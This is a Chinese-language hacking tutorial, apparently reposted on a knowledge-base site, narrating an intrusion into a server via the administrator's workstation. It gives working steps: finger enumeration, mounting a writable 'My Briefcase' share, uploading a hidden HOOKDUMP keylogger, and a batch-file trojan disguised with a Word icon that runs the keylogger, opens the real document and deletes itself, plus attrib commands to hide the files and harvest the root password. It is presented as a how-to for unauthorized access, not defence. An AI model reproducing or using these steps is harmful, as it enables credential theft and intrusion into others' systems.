主頁 > 知識(shí)庫 > 黑客怎樣入侵Linux系統(tǒng)

黑客怎樣入侵Linux系統(tǒng)
熱門標(biāo)簽:簡易地圖標(biāo)注應(yīng)用 億信虛擬網(wǎng)絡(luò)電話外呼系統(tǒng) 地圖標(biāo)注需要學(xué)什么 凱立德飛機(jī)場地圖標(biāo)注點(diǎn) 湖南電話機(jī)器人開發(fā)團(tuán)隊(duì) 百度地圖標(biāo)注多少個(gè) 免費(fèi)地圖標(biāo)注店 智能電話機(jī)器人哪個(gè)公司有名 北京電話機(jī)器人哪家便宜
我發(fā)現(xiàn)了一個(gè)網(wǎng)站,于是常規(guī)入侵。很好,它的FINGER開著,于是我編了一個(gè)SHELL,aaa帳號(hào)試到zzz(by the way,這是我發(fā)現(xiàn)的一個(gè)網(wǎng)上規(guī)律,那就是帳號(hào)的長度與口令的強(qiáng)度成正比,如果一個(gè)帳號(hào)只有兩三位長,那它的口令一般也很簡單,反之亦然,故且稱之為若氏定理吧),結(jié)果一個(gè)帳號(hào)也不存在,我沒有再試它的帳號(hào)。因?yàn)槲冶凰_的端口吸引住了,它開著WWW,我就不信它不出錯(cuò)。一連拿了五種CGI和WWW掃描器總計(jì)掃了三四百種常見錯(cuò)誤它幾乎都不存在還是看看root的信息吧:
  finger root@xxx.xxx.xxx
  Login name: root In real life: system PRIVILEGED account
  Directory: / Shell: /bin/sh
  Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
  No Plan.
  root經(jīng)常來,那個(gè)202.xx.xx.xx就是他用的工作站了,從那會(huì)不會(huì)看到點(diǎn)東西呢?
  net view \202.xx.xx.xx
  Shared resources at \202.xx.xx.xx
  Sharename Type Comment
  x
  x
  我的公文包
  The command was completed successfully.
  在上網(wǎng)的機(jī)器上開著WINDOWS的“文件和打印機(jī)共享”的服務(wù),是很多人容易掉以輕心的,這個(gè)root沒有例外。如果它的C盤共享了而且可寫那就好了,但那是做夢,現(xiàn)在開了共享的目錄沒有一個(gè)是根目錄,連D驅(qū)的都沒有。別著急,慢慢來。x掉的那些文件夾都沒用,不能寫,里面盡是些英文原著,這個(gè)root還挺行的。“我的公文包”吸引了我的注意,這是一個(gè)用于將不同的機(jī)器上的資料進(jìn)行同步的工具,很顯然這個(gè)root要經(jīng)常更新主機(jī)上的主頁,有時(shí)候在自己的機(jī)器上編,有時(shí)候在主機(jī)上編……所以很重要的一點(diǎn):“我的公文包”的共享一般都是可寫的!
  那我再進(jìn)去看看。
  >net use i: \202.xx.xx.xx
  >i:
  >echo asdf>temp.txt
  不錯(cuò),確實(shí)可寫。
  >del temp.txt
  不留痕跡——黑客的習(xí)慣。
  >dir/od/p
  看看都有些什么…… 倒數(shù)第二排那個(gè)是什么?“X月工作計(jì)劃.doc”!就是它了,既然是計(jì)劃就不可能寫完了就丟一邊,它肯定會(huì)再次打開它的——至少下個(gè)月寫計(jì)劃時(shí)要COPY一下:->
page
  該動(dòng)手了,我的目標(biāo)就是讓它下次打開時(shí)誤中我的陷阱而運(yùn)行我藏的木馬。我這次用的是一個(gè)鍵盤計(jì)錄軟件HOOKDUMP,我覺得它挺好的,價(jià)錢實(shí)惠,量也足…… 對不起,說習(xí)慣了,應(yīng)該是它不僅記錄下全部擊鍵,還記錄下打開或關(guān)掉了什么程序、按過什么按紐、用過什么菜單…… 總之,它的記錄讓你就和你站在他身后看他操作計(jì)算機(jī)一樣詳細(xì)了。您要問那么多木馬你為啥裝這個(gè)?要知道無論是中國的冰河、netspy還是外國的netbus、BO,都被各種殺毒軟件列為頭號(hào)偵查對象,而一個(gè)root的機(jī)器上可不可能沒裝殺毒軟件?還是HOOKDUMP好,小小的,不起眼,不過如果大家都用只怕我再用它的機(jī)會(huì)就少了……
  >copy hookdump.* i:
  補(bǔ)充一點(diǎn):上傳前先編好它的hookdump.ini文件,置為隱藏方式運(yùn)行,不然root一運(yùn)行屏幕上蹦出一大窗口可就……。
  然后再在自己的機(jī)器上編一個(gè)同名的BAT文件:X月工作計(jì)劃.BAT
  >edit c:X月工作計(jì)劃.BAT
  @echo off
  hookdump
  attrib -h X月工作計(jì)劃.doc
  C:Program FilesMicrosoftOfficeWinword X月工作計(jì)劃.doc
  attrib -h temp.bat
  del temp.pif
  del temp.bat
  看明白了吧?root運(yùn)行了這個(gè)BAT文件實(shí)際上就是先運(yùn)行木馬,再調(diào)用WINWORD文件打開它想開的這個(gè)文件,然后自我刪除,也許它機(jī)器上WINWORD的位置不同,那調(diào)用就會(huì)失敗,不過不要緊,反正BAT會(huì)馬上刪除,他會(huì)以為是自己的誤操作。
  這時(shí)你的C驅(qū)根目錄就有了這么一個(gè)BAT文件,它是一個(gè)方形的圖標(biāo),和那個(gè)WORD文件大相徑庭,root怎么會(huì)運(yùn)行它呢?沒關(guān)系,在這個(gè)文件上點(diǎn)右鍵,點(diǎn)屬性,在“程序”欄選“更改圖標(biāo)”不就行了嗎?WORD的圖標(biāo)在你機(jī)器C:Program FilesMicrosoftOffice中。還要將“運(yùn)行”改為“最小化”,“退出時(shí)關(guān)閉”打上勾,這樣才能保證在運(yùn)行時(shí)一點(diǎn)跡象也沒有。事實(shí)上這個(gè) BAT文件變成了兩個(gè),還有一個(gè)PIF文件就是它的圖標(biāo)。
  把這兩個(gè)文件傳上去:
  >copy X月工作計(jì)劃.bat i:
  >copy X月工作計(jì)劃.pif i:
  然后把它的文件和自己的文件都藏起來:
  >attrib +h X月工作計(jì)劃.doc
  >attrib +h X月工作計(jì)劃.bat
  這樣,root的“公文包”里只剩下一個(gè)和原來一模一樣的WORD圖標(biāo),他做夢也沒想到這已變成了一個(gè)BAT文件。然后可以喘口氣了,讓我們靜靜的等……
  幾天后,我進(jìn)入這個(gè)工作站,取下記錄下來的擊鍵記錄,找出root的口令,進(jìn)入主機(jī)。

標(biāo)簽:延邊 龍巖 遼陽 北海 眉山 淘寶邀評 大興安嶺 南陽

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《黑客怎樣入侵Linux系統(tǒng)》,本文關(guān)鍵詞  黑客,怎樣,入侵,Linux,系統(tǒng),;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《黑客怎樣入侵Linux系統(tǒng)》相關(guān)的同類信息!
  • 本頁收集關(guān)于黑客怎樣入侵Linux系統(tǒng)的相關(guān)信息資訊供網(wǎng)民參考!
    • 推薦文章